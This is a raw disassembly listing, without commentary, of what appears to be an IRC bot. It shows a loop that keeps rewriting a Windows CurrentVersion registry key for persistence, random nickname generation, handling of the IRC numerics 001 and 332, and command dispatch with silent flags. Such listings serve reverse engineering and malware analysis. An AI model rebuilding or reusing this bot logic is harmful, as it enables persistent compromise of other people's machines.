push offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_4170E2: ; CODE XREF: sub_416F86+149�j
push [ebp+94h+var_110]
call sub_402B9B
push [ebp+94h+var_108]
call sub_402B9B
push ebx
call sub_402B9B
push esi
call sub_402B9B
mov ecx, [ebp+94h+var_4]
add esp, 10h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 94h
leave
retn
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_417119 proc near ; DATA XREF: seg000:0041BF1E�o
var_504 = byte ptr -504h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_304 = byte ptr -304h
var_303 = byte ptr -303h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 504h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 0FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push esi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
push esi
lea eax, [ebp+var_303]
push ebx
push eax
mov [ebp+var_304], bl
call sub_407B70
push esi
lea eax, [ebp+var_103]
push ebx
push eax
mov [ebp+var_104], bl
call sub_407B70
add esp, 30h
mov edi, 100h
loc_41718E: ; CODE XREF: sub_417119+1AE�j
push edi
lea esi, [ebp+var_204]
mov ebx, offset byte_425119
call sub_4196D1
push edi
lea esi, [ebp+var_404]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
pop ecx
mov esi, 0FFh
push esi
lea eax, [ebp+var_304]
push eax
call ds:dword_41D0F4
lea eax, [ebp+var_404]
push eax
lea eax, [ebp+var_304]
push eax
push offset aSS_3 ; "%s\\%s"
lea eax, [ebp+var_104]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_104]
add esp, 14h
lea ecx, [eax+1]
loc_4171F1: ; CODE XREF: sub_417119+DD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4171F1
sub eax, ecx
xor ebx, ebx
mov [ebp+eax+var_104], bl
push edi
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_417258
lea ecx, [ebp+var_504]
lea eax, [ebp+var_104]
loc_417231: ; CODE XREF: sub_417119+130�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_41724F
cmp dl, bl
jz short loc_41724B
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_41724F
inc eax
inc eax
inc ecx
inc ecx
cmp dl, bl
jnz short loc_417231
loc_41724B: ; CODE XREF: sub_417119+120�j
xor eax, eax
jmp short loc_417254
; ---------------------------------------------------------------------------
loc_41724F: ; CODE XREF: sub_417119+11C�j
; sub_417119+128�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417254: ; CODE XREF: sub_417119+134�j
cmp eax, ebx
jz short loc_417273
loc_417258: ; CODE XREF: sub_417119+10A�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_417273: ; CODE XREF: sub_417119+13D�j
push edi
lea eax, [ebp+var_304]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_104]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_504]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_204]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_404]
push ebx
push eax
call sub_407B70
add esp, 3Ch
push 3A98h
call ds:dword_41D0FC
jmp loc_41718E
sub_417119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172CC proc near ; CODE XREF: sub_41783D+24F�p
; sub_41783D+323�p ...
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
mov esi, 1FFh
push esi
lea eax, [ebp+var_203]
push 0
push eax
mov [ebp+var_204], 0
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_204]
push esi
push eax
call sub_403436
lea eax, [ebp+var_204]
add esp, 1Ch
lea esi, [eax+1]
loc_41731B: ; CODE XREF: sub_4172CC+54�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41731B
sub eax, esi
mov [ebp+eax+var_204], cl
lea eax, [ebp+var_204]
lea esi, [eax+1]
loc_417334: ; CODE XREF: sub_4172CC+6D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417334
push 0
sub eax, esi
push eax
lea eax, [ebp+var_204]
push eax
push dword ptr [edi]
call ds:dword_41D228
mov ecx, [ebp+var_4]
test eax, eax
setnz al
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_4172CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417361 proc near ; CODE XREF: sub_40177B+268�p
; sub_4019F3+21A�p ...
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 40Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_408], eax
mov eax, [ebp+arg_8]
mov edi, 1FFh
xor ebx, ebx
push edi
mov [ebp+var_40C], eax
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push edi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
add esp, 18h
cmp [ebp+arg_4], 1
jz loc_41747D
push esi
push 0Dh
call sub_402648
mov esi, eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_404]
push edi
push eax
call sub_403436
lea eax, [ebp+var_404]
add esp, 14h
lea ecx, [eax+1]
loc_4173EE: ; CODE XREF: sub_417361+92�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4173EE
sub eax, ecx
push esi
mov [ebp+eax+var_404], bl
call sub_402A45
push eax
mov ebx, offset dword_425570
call sub_4196D1
lea eax, [ebp+var_404]
push eax
push [ebp+var_40C]
lea eax, [ebp+var_204]
push esi
push offset aSSS_1 ; "%s %s %s\r\n"
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_204]
add esp, 20h
lea ecx, [eax+1]
loc_41743B: ; CODE XREF: sub_417361+DF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41743B
sub eax, ecx
push esi
mov [ebp+eax+var_204], dl
call sub_402B9B
pop ecx
lea eax, [ebp+var_204]
lea ecx, [eax+1]
pop esi
loc_41745C: ; CODE XREF: sub_417361+100�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41745C
sub eax, ecx
push 0
push eax
lea eax, [ebp+var_204]
push eax
mov eax, [ebp+var_408]
push dword ptr [eax]
call ds:dword_41D228
loc_41747D: ; CODE XREF: sub_417361+5D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41748B proc near ; CODE XREF: sub_41802F+23B�p
; sub_41829C+39�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor eax, eax
mov [ebp+var_40], 0
lea edi, [ebp+var_3F]
stosw
stosb
push 0Dh
pop ecx
mov esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
lea edi, [ebp+var_3C]
rep movsd
lea eax, [ebp+var_48]
push eax
movsb
call ds:dword_41D1EC
call ds:dword_41D108
mov ecx, [ebp+var_48]
mov edx, [ebp+var_44]
add ecx, edx
cmp eax, ecx
jb short loc_4174D7
add ecx, eax
jmp short loc_4174D9
; ---------------------------------------------------------------------------
loc_4174D7: ; CODE XREF: sub_41748B+46�j
sub ecx, eax
loc_4174D9: ; CODE XREF: sub_41748B+4A�j
push ecx
call sub_403356
pop ecx
push 8
pop ecx
xor eax, eax
mov edi, ebx
rep stosd
push offset asc_420310 ; "["
stosw
push 22h
push ebx
stosb
call sub_402AEE
mov eax, ebx
add esp, 0Ch
lea esi, [eax+1]
loc_417501: ; CODE XREF: sub_41748B+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417501
xor edi, edi
sub eax, esi
push edi
mov [eax+ebx], cl
push 4
pop ecx
lea esi, [ebp+var_40]
call sub_418E51
pop ecx
mov eax, esi
push eax
push ebx
push offset aSS ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea esi, [eax+1]
loc_417535: ; CODE XREF: sub_41748B+AF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417535
sub eax, esi
push edi
push 4
lea esi, [ebp+var_40]
mov [eax+ebx], cl
call sub_418E1F
mov eax, esi
push eax
push ebx
push offset aSS_0 ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea esi, [eax+1]
loc_417565: ; CODE XREF: sub_41748B+DF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417565
sub eax, esi
mov [eax+ebx], cl
call sub_419347
test al, al
jz short loc_41759C
push ebx
push offset aSp ; "%sP|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_417590: ; CODE XREF: sub_41748B+10A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417590
sub eax, esi
mov [eax+ebx], cl
loc_41759C: ; CODE XREF: sub_41748B+ED�j
call sub_418DA0
mov eax, ds:dword_42659C
cmp eax, edi
mov ecx, ds:dword_426598
jg short loc_4175D8
jl short loc_4175B7
cmp ecx, 0Ah
jnb short loc_4175D8
loc_4175B7: ; CODE XREF: sub_41748B+125�j
push eax
push ecx
push ebx
push offset aS0I64u ; "%s0%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175CF: ; CODE XREF: sub_41748B+149�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175CF
jmp short loc_4175F7
; ---------------------------------------------------------------------------
loc_4175D8: ; CODE XREF: sub_41748B+123�j
; sub_41748B+12A�j
push eax
push ecx
push ebx
push offset aSI64u ; "%s%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175F0: ; CODE XREF: sub_41748B+16A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175F0
loc_4175F7: ; CODE XREF: sub_41748B+14B�j
sub eax, esi
mov byte ptr [eax+ebx], 0
xor esi, esi
cmp ds:dword_42521C, edi
jle short loc_417644
loc_417607: ; CODE XREF: sub_41748B+1B7�j
call sub_403363
push 31h
pop ecx
xor edx, edx
div ecx
movsx eax, [ebp+edx+var_3C]
push eax
push ebx
push offset aSC ; "%s%c"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea edi, [eax+1]
loc_41762F: ; CODE XREF: sub_41748B+1A9�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41762F
sub eax, edi
inc esi
mov [eax+ebx], cl
cmp esi, ds:dword_42521C
jl short loc_417607
loc_417644: ; CODE XREF: sub_41748B+17A�j
push ebx
push offset aS ; "%s]"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_41765A: ; CODE XREF: sub_41748B+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41765A
sub eax, esi
mov [eax+ebx], cl
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
mov eax, ebx
pop esi
call sub_402710
leave
retn
sub_41748B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417676 proc near ; CODE XREF: sub_41783D+6A7�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 824h
push ebx
push esi
push edi
push offset asc_4202C8 ; " "
push [ebp+arg_14]
xor ebx, ebx
mov byte ptr [ebp+var_8], 0
mov [ebp+var_4], ebx
call sub_403A34
jmp short loc_4176D8
; ---------------------------------------------------------------------------
loc_41769A: ; CODE XREF: sub_417676+68�j
mov eax, [ebp+var_4]
push offset aS_8 ; "-s"
push esi
mov [ebp+eax*4+var_820], esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_4176C6
push offset aS_9 ; "/s"
push esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz short loc_4176CA
loc_4176C6: ; CODE XREF: sub_417676+3D�j
mov byte ptr [ebp+var_8], 1
loc_4176CA: ; CODE XREF: sub_417676+4E�j
push offset asc_4202D4 ; " "
push ebx
call sub_403A34
inc [ebp+var_4]
loc_4176D8: ; CODE XREF: sub_417676+22�j
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_41769A
mov edi, [ebp+arg_0]
mov esi, [ebp+var_820]
add edi, 5
mov edx, edi
mov ecx, esi
loc_4176F0: ; CODE XREF: sub_417676+92�j
mov al, [ecx]
cmp al, [edx]
jnz short loc_41770E
test al, al
jz short loc_41770A
mov al, [ecx+1]
cmp al, [edx+1]
jnz short loc_41770E
inc ecx
inc ecx
inc edx
inc edx
test al, al
jnz short loc_4176F0
loc_41770A: ; CODE XREF: sub_417676+82�j
xor eax, eax
jmp short loc_417713
; ---------------------------------------------------------------------------
loc_41770E: ; CODE XREF: sub_417676+7E�j
; sub_417676+8A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417713: ; CODE XREF: sub_417676+96�j
cmp eax, ebx
jz short loc_417724
mov eax, edi
mov ecx, esi
call sub_419044
test eax, eax
jz short loc_417750
loc_417724: ; CODE XREF: sub_417676+9F�j
xor eax, eax
cmp [ebp+var_4], ebx
jle short loc_41774D
mov ecx, [ebp+var_4]
dec ecx
loc_41772F: ; CODE XREF: sub_417676+CF�j
cmp eax, ecx
jz short loc_417741
mov edx, [ebp+eax*4+var_81C]
mov [ebp+eax*4+var_820], edx
loc_417741: ; CODE XREF: sub_417676+BB�j
inc eax
cmp eax, [ebp+var_4]
jl short loc_41772F
mov esi, [ebp+var_820]
loc_41774D: ; CODE XREF: sub_417676+B3�j
dec [ebp+var_4]
loc_417750: ; CODE XREF: sub_417676+AC�j
cmp byte ptr [ebp+var_8], bl
jz short loc_417758
dec [ebp+var_4]
loc_417758: ; CODE XREF: sub_417676+DD�j
mov al, [esi]
cmp al, ds:byte_424FE8
jnz loc_417836
mov eax, esi
lea ecx, [eax+1]
loc_41776B: ; CODE XREF: sub_417676+FA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41776B
sub eax, ecx
push eax
lea eax, [esi+1]
push eax
push esi
call sub_403910
mov eax, ds:dword_433C40
mov esi, [eax]
mov ebx, offset dword_433C3C
mov edi, ebx
add esp, 0Ch
mov [ebp+var_C], esi
mov [ebp+var_10], edi
loc_417796: ; CODE XREF: sub_417676+192�j
test edi, edi
mov eax, ds:dword_433C40
mov [ebp+var_14], eax
jz short loc_4177A6
cmp edi, ebx
jz short loc_4177AB
loc_4177A6: ; CODE XREF: sub_417676+12A�j
call sub_402F5D
loc_4177AB: ; CODE XREF: sub_417676+12E�j
cmp esi, [ebp+var_14]
jz loc_417836
test edi, edi
jnz short loc_4177BD
call sub_402F5D
loc_4177BD: ; CODE XREF: sub_417676+140�j
cmp esi, [edi+4]
jnz short loc_4177C7
call sub_402F5D
loc_4177C7: ; CODE XREF: sub_417676+14A�j
mov ecx, [ebp+var_820]
lea eax, [esi+0Ch]
loc_4177D0: ; CODE XREF: sub_417676+172�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_4177EE
test dl, dl
jz short loc_4177EA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_4177EE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_4177D0
loc_4177EA: ; CODE XREF: sub_417676+162�j
xor eax, eax
jmp short loc_4177F3
; ---------------------------------------------------------------------------
loc_4177EE: ; CODE XREF: sub_417676+15E�j
; sub_417676+16A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4177F3: ; CODE XREF: sub_417676+176�j
test eax, eax
jz short loc_41780A
lea edi, [ebp+var_20]
lea esi, [ebp+var_10]
call sub_40168C
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jmp short loc_417796
; ---------------------------------------------------------------------------
loc_41780A: ; CODE XREF: sub_417676+17F�j
cmp esi, [edi+4]
jnz short loc_417814
call sub_402F5D
loc_417814: ; CODE XREF: sub_417676+197�j
mov ecx, [esi+8]
mov eax, [ecx]
lea edx, [ebp+var_820]
push edx
mov edx, [ebp+var_4]
dec edx
push edx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_4]
call dword ptr [eax]
loc_417836: ; CODE XREF: sub_417676+EA�j
; sub_417676+138�j
pop edi
pop esi
pop ebx
leave
retn 18h
sub_417676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41783D proc near ; CODE XREF: sub_417F01+107�p
var_10F34 = dword ptr -10F34h
var_10734 = dword ptr -10734h
var_10730 = dword ptr -10730h
var_1072C = byte ptr -1072Ch
var_1062C = byte ptr -1062Ch
var_1052C = byte ptr -1052Ch
var_1042C = byte ptr -1042Ch
var_72C = byte ptr -72Ch
var_72B = byte ptr -72Bh
var_62C = byte ptr -62Ch
var_62B = byte ptr -62Bh
var_52C = byte ptr -52Ch
var_52B = byte ptr -52Bh
var_52A = byte ptr -52Ah
var_32C = byte ptr -32Ch
var_32B = byte ptr -32Bh
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_1AC = byte ptr -1ACh
var_1AB = byte ptr -1ABh
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10F38h
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [ebp+var_10734], eax
lea eax, [ebp+var_52B]
mov edi, ecx
push ebx
push eax
mov [ebp+var_10730], edi
mov [ebp+var_52C], bl
call sub_407B70
add esp, 0Ch
push edi
push offset aS_12 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 10h
lea edi, [eax+1]
loc_4178A5: ; CODE XREF: sub_41783D+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178A5
sub eax, edi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
push offset asc_420254 ; " :"
push eax
call sub_4037B0
push eax
push offset aS_13 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 18h
lea esi, [eax+1]
loc_4178E5: ; CODE XREF: sub_41783D+AD�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178E5
sub eax, esi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
lea esi, [eax+1]
loc_4178FE: ; CODE XREF: sub_41783D+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178FE
sub eax, esi
push eax
lea eax, [ebp+var_52A]
push eax
lea eax, [ebp+var_52C]
push eax
call sub_403910
add esp, 0Ch
push offset asc_42025C ; " "
push [ebp+var_10730]
call sub_403A34
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41797F
xor esi, esi
loc_417936: ; CODE XREF: sub_41783D+140�j
push eax
push offset aS_14 ; "%s"
lea edi, [ebp+esi+var_1072C]
push 0FFh
push edi
call sub_402AEE
mov eax, edi
add esp, 10h
lea edi, [eax+1]
loc_417956: ; CODE XREF: sub_41783D+11E�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417956
sub eax, edi
add eax, esi
push offset asc_420264 ; " "
push ebx
mov [ebp+eax+var_1072C], bl
call sub_403A34
pop ecx
add esi, 100h
cmp eax, ebx
pop ecx
jnz short loc_417936
loc_41797F: ; CODE XREF: sub_41783D+F5�j
xor eax, eax
mov [ebp+var_2C], bl
lea edi, [ebp+var_2B]
stosd
stosd
xor eax, eax
mov [ebp+var_38], bl
lea edi, [ebp+var_37]
stosd
stosd
xor eax, eax
mov [ebp+var_54], bl
lea edi, [ebp+var_53]
stosd
stosd
stosd
xor eax, eax
mov [ebp+var_20], bl
lea edi, [ebp+var_1F]
stosd
push 0FFh
stosd
lea eax, [ebp+var_32B]
push ebx
push eax
mov [ebp+var_32C], bl
call sub_407B70
add esp, 0Ch
push 2Fh
lea eax, [ebp+var_A7]
push ebx
push eax
mov [ebp+var_A8], bl
call sub_407B70
xor eax, eax
mov [ebp+var_14], bl
lea edi, [ebp+var_13]
stosd
stosd
xor eax, eax
mov [ebp+var_44], bl
lea edi, [ebp+var_43]
stosd
add esp, 0Ch
push 7Fh
stosd
lea eax, [ebp+var_22B]
push ebx
push eax
mov [ebp+var_22C], bl
call sub_407B70
add esp, 0Ch
push 9
lea esi, [ebp+var_2C]
mov ebx, offset byte_425543
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_38]
mov ebx, offset byte_425555
call sub_4196D1
pop ecx
push 0Dh
lea esi, [ebp+var_54]
mov ebx, offset dword_425570
call sub_4196D1
pop ecx
lea ecx, [ebp+var_2C]
lea eax, [ebp+var_1072C]
loc_417A40: ; CODE XREF: sub_41783D+21B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417A5E
test dl, dl
jz short loc_417A5A
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417A5E
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417A40
loc_417A5A: ; CODE XREF: sub_41783D+20B�j
xor eax, eax
jmp short loc_417A63
; ---------------------------------------------------------------------------
loc_417A5E: ; CODE XREF: sub_41783D+207�j
; sub_41783D+213�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417A63: ; CODE XREF: sub_41783D+21F�j
test eax, eax
jnz short loc_417AA7
push 9
lea esi, [ebp+var_20]
mov ebx, offset dword_42554C
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_1062C]
push eax
mov eax, esi
push eax
push offset aSS_9 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
test al, al
jnz short loc_417A9F
loc_417A98: ; CODE XREF: sub_41783D+333�j
xor al, al
jmp loc_417EF0
; ---------------------------------------------------------------------------
loc_417A9F: ; CODE XREF: sub_41783D+259�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosb
loc_417AA7: ; CODE XREF: sub_41783D+228�j
lea ecx, [ebp+var_38]
lea eax, [ebp+var_1062C]
loc_417AB0: ; CODE XREF: sub_41783D+28B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417ACE
test dl, dl
jz short loc_417ACA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417ACE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AB0
loc_417ACA: ; CODE XREF: sub_41783D+27B�j
xor eax, eax
jmp short loc_417AD3
; ---------------------------------------------------------------------------
loc_417ACE: ; CODE XREF: sub_41783D+277�j
; sub_41783D+283�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417AD3: ; CODE XREF: sub_41783D+28F�j
test eax, eax
jnz loc_417B75
push 100h
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
mov ecx, esi
lea eax, [ebp+var_1052C]
loc_417AF9: ; CODE XREF: sub_41783D+2D4�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417B17
test dl, dl
jz short loc_417B13
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417B17
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AF9
loc_417B13: ; CODE XREF: sub_41783D+2C4�j
xor eax, eax
jmp short loc_417B1C
; ---------------------------------------------------------------------------
loc_417B17: ; CODE XREF: sub_41783D+2C0�j
; sub_41783D+2CC�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417B1C: ; CODE XREF: sub_41783D+2D8�j
test eax, eax
jnz loc_417EEE
push 9
lea esi, [ebp+var_14]
mov ebx, offset word_42555E
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
mov eax, esi
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
push offset aSSS_2 ; "%s %s %s\r\n"
call sub_4172CC
add esp, 10h
loc_417B68: ; CODE XREF: sub_41783D+3E0�j
test al, al
jnz loc_417EEE
jmp loc_417A98
; ---------------------------------------------------------------------------
loc_417B75: ; CODE XREF: sub_41783D+298�j
push 4
mov edi, offset a001 ; "001"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417C22
push 9
lea esi, [ebp+var_14]
mov ebx, offset word_42555E
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_44]
mov ebx, offset byte_425567
call sub_4196D1
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
mov [esp+10h+var_10], 100h
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
pop ecx
push 80h
lea esi, [ebp+var_22C]
mov ebx, offset byte_424FE9
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, esi
push eax
lea eax, [edi+5]
push eax
lea eax, [ebp+var_44]
push eax
push offset aSSSSSS ; "%s %s %s\r\n%s %s %s\r\n"
call sub_4172CC
add esp, 1Ch
jmp loc_417B68
; ---------------------------------------------------------------------------
loc_417C22: ; CODE XREF: sub_41783D+34A�j
lea ecx, [ebp+var_54]
lea eax, [ebp+var_1062C]
loc_417C2B: ; CODE XREF: sub_41783D+406�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417C49
test dl, dl
jz short loc_417C45
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417C49
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417C2B
loc_417C45: ; CODE XREF: sub_41783D+3F6�j
xor eax, eax
jmp short loc_417C4E
; ---------------------------------------------------------------------------
loc_417C49: ; CODE XREF: sub_41783D+3F2�j
; sub_41783D+3FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417C4E: ; CODE XREF: sub_41783D+40A�j
test eax, eax
jz short loc_417C6A
push 4
mov edi, offset a332 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417EEE
loc_417C6A: ; CODE XREF: sub_41783D+413�j
push 8
pop ecx
xor eax, eax
mov [ebp+var_78], 0
lea edi, [ebp+var_77]
rep stosd
mov ebx, 0FFh
push ebx
stosw
xor esi, esi
lea eax, [ebp+var_1AB]
push esi
push eax
mov byte ptr [ebp+var_10730], 0
mov [ebp+var_1AC], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_62B]
push esi
push eax
mov [ebp+var_62C], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_72B]
push esi
push eax
mov [ebp+var_72C], 0
call sub_407B70
add esp, 0Ch
lea eax, [ebp+var_1072C]
push offset asc_42029C ; " :"
push eax
call sub_403A34
push eax
push offset aS_0 ; "%s"
lea eax, [ebp+var_62C]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_62C]
add esp, 18h
lea esi, [eax+1]
loc_417D00: ; CODE XREF: sub_41783D+4C8�j
mov cl, [eax]
inc eax
